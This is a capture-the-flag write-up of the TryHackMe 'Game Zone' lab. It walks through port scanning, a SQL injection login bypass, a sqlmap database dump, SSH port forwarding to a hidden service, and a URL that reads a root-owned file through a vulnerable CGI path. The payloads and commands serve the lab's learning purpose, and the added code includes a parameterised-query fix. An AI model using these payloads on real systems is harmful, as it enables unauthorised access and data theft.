
GameZone-writeup-THM

My writeup of the TryHackMe room "Game Zone".

We are going to start with a port scan of the target (the default scan covers the 1000 most common TCP ports):

```console
nmap <target_ip>

Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 10:50 EST
Nmap scan report for 10.10.108.222
Host is up (0.060s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
259/tcp filtered esro-gen

Nmap done: 1 IP address (1 host up) scanned in 9.93 seconds
```

Only SSH (22) and HTTP (80) are reachable from the outside; keep that in mind for later, when we find more services from inside the box.

First of all we open the web page and see a picture of a hitman. If you don't know his name, a Google Images (reverse image) search will identify him.

Then we find a login page and try SQL injection.

We do this by entering `' or 1=1 -- -` as the username (the password can be anything).

The single quote closes the string literal in the login query, `or 1=1` makes the `WHERE` clause true for every row, and `-- -` turns the rest of the original query into a comment. The query therefore returns a user without a valid password, and we are logged in to the site.
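The following is an added example, not code from the original writeup or from the room, showing why that payload works and how a parameterised query defeats it. The room's backend is MySQL; an in-memory SQLite database, the `users` table and the `agent47` account are stand-ins constructed for the demo.

```python
"""Added example (not from the original writeup): why `' or 1=1 -- -`
bypasses a login form that builds its SQL by string concatenation.

An in-memory SQLite database stands in for the room's MySQL backend so
the example runs offline. Table, columns and the single account are
constructed sample data.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one valid account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('agent47', 'correct-horse')")
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    # The classic mistake: user input pasted straight into the SQL text.
    return (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND pwd = '{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # With username `' or 1=1 -- -` the query becomes
    #   ... WHERE username = '' or 1=1 -- -' AND pwd = '...'
    # Everything after `--` is a comment, so the WHERE clause is always true.
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the values are bound separately from the SQL
    # text, so quotes and comment markers in the input never change the
    # query's structure. Plain-text password storage is kept only to
    # mirror the vulnerable version; real code compares password hashes.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 -- -"
    print(build_vulnerable_query(payload, "anything"))
    print("vulnerable login:", login_vulnerable(db, payload, "anything"))
    print("safe login:     ", login_safe(db, payload, "anything"))
```

Running the block prints the injected query as the database sees it, then `True` for the concatenated version and `False` for the parameterised one. The trailing `-` in `-- -` matters on MySQL, where `--` only starts a comment when followed by whitespace; SQLite accepts `--` on its own, so the same payload works in both.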

Now we are going to use sqlmap to dump the entire database.

Before that we need to capture the login request with Burp Suite, because sqlmap will replay that exact request with its own payloads.

You can do that by:

  • activating the Burp proxy in your browser,
  • capturing the login request to the Game Zone portal,
  • copying the raw request into a text file,
  • and feeding that file to sqlmap like this:

```bash
sqlmap -r request.txt --dbms=mysql --dump --threads=5
```

`-r` reads the captured HTTP request (headers, cookies and POST body included), `--dbms=mysql` skips backend fingerprinting, `--dump` extracts the table contents and `--threads=5` speeds up the retrieval.

Now that we have a username and password from the dump, we log in to the box with SSH (port 22 was open in the scan).

Once on the host, we use a tool called `ss` to investigate the sockets on it.

Running `ss -tulpn` lists the listening TCP and UDP sockets and the processes behind them:

| Argument | Description |
|----------|-------------|
| `-t` | Display TCP sockets |
| `-u` | Display UDP sockets |
| `-l` | Display only listening sockets |
| `-p` | Show the process using the socket |
| `-n` | Don't resolve service names (show port numbers) |

We see a service listening on port 10000 that did not show up in our nmap scan: the firewall blocks it from the outside, so it is only reachable from the host itself.

So we go back to our own machine and run `ssh -L 10000:localhost:10000 <username>@<ip>`. This local port forward makes port 10000 on our machine tunnel through the SSH session to port 10000 on the target's loopback interface, bypassing the firewall rule.
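As an added example (not part of the original writeup), the check behind the last two steps in code: parse `ss -tulpn` output, compare the listeners against the ports the external nmap scan showed, and build the `ssh -L` command for anything that is listening but unreachable from outside. The `ss` output below is constructed for the demo and is not the room's real output.

```python
"""Added example (not from the original writeup): find services that
listen on the host but were not visible to the external port scan, and
build the matching `ssh -L` local forward for each one.

SS_OUTPUT is a constructed `ss -tulpn` capture, not the room's real one.
"""
from dataclasses import dataclass

SS_OUTPUT = """\
Netid  State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
udp    UNCONN  0       0             0.0.0.0:68         0.0.0.0:*      users:(("dhclient",pid=612,fd=6))
tcp    LISTEN  0       128           0.0.0.0:22         0.0.0.0:*      users:(("sshd",pid=912,fd=3))
tcp    LISTEN  0       128                 *:80               *:*
tcp    LISTEN  0       128           0.0.0.0:10000      0.0.0.0:*
tcp    LISTEN  0       128              [::]:22            [::]:*      users:(("sshd",pid=912,fd=4))
"""


@dataclass(frozen=True)
class Listener:
    proto: str     # "tcp" or "udp" (the Netid column)
    addr: str      # local address as printed, e.g. "0.0.0.0", "*", "[::]"
    port: int
    process: str   # empty when ss could not show it (needs root for others' sockets)


def parse_ss(output: str) -> list[Listener]:
    """Parse `ss -tulpn` output into Listener records."""
    listeners: list[Listener] = []
    for line in output.splitlines():
        parts = line.split()
        # Skip blank lines, the header, and anything too short to be a socket row.
        if len(parts) < 6 or parts[0] == "Netid":
            continue
        netid, _state, _recvq, _sendq, local, _peer = parts[:6]
        # The Process column is optional: absent for sockets owned by other
        # users when ss is run unprivileged.
        process = parts[6] if len(parts) > 6 else ""
        # Split on the LAST colon so IPv6 forms like "[::]:22" keep their address.
        addr, _, port = local.rpartition(":")
        if not port.isdigit():
            continue
        listeners.append(Listener(netid, addr, int(port), process))
    return listeners


def hidden_listeners(ss_output: str, externally_open: set[int], proto: str = "tcp") -> list[Listener]:
    """Listeners the external scan did not show: candidates for port forwarding."""
    found = {
        lst for lst in parse_ss(ss_output)
        if lst.proto == proto and lst.port not in externally_open
    }
    return sorted(found, key=lambda lst: (lst.port, lst.addr))


def ssh_forward_command(listener: Listener, user: str, host: str) -> str:
    """The `ssh -L` line that exposes the hidden port on our own machine."""
    return f"ssh -L {listener.port}:localhost:{listener.port} {user}@{host}"


if __name__ == "__main__":
    # Ports the nmap scan earlier in the writeup reported as open.
    scanned_open = {22, 80}
    for lst in hidden_listeners(SS_OUTPUT, scanned_open):
        print(f"hidden listener {lst.addr}:{lst.port} ({lst.process or 'process not shown'})")
        print("  ", ssh_forward_command(lst, "<username>", "<ip>"))
```

On the constructed capture this flags only port 10000 and prints the same `ssh -L 10000:localhost:10000 <username>@<ip>` command used above; the empty process column for that socket is the realistic case when `ss` is run as an unprivileged user.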

Once the tunnel is up, we open our browser and go to http://localhost:10000,

where we are met with another login page.

I just used the credentials that we already have, and they worked.

After that we can use Metasploit: search for the exploit module matching this service and version, and run it with the options it requires.

I tried for long enough to make it work, but I didn't succeed;

in the end I searched Exploit-DB and read what the exploit does, and found out that it just allows you to execute arbitrary commands in the /file/show.cgi component.

Viewing the hint, I know that the flag is in root.txt, so I just had to request this:

```
http://localhost:10000/file/show.cgi/root/root.txt
```

The CGI returns the contents of the file whose path is appended to the URL, and because the service runs with enough privilege to read files under /root, this single request prints the flag, no Metasploit needed.
This post is licensed under CC BY 4.0 by the author.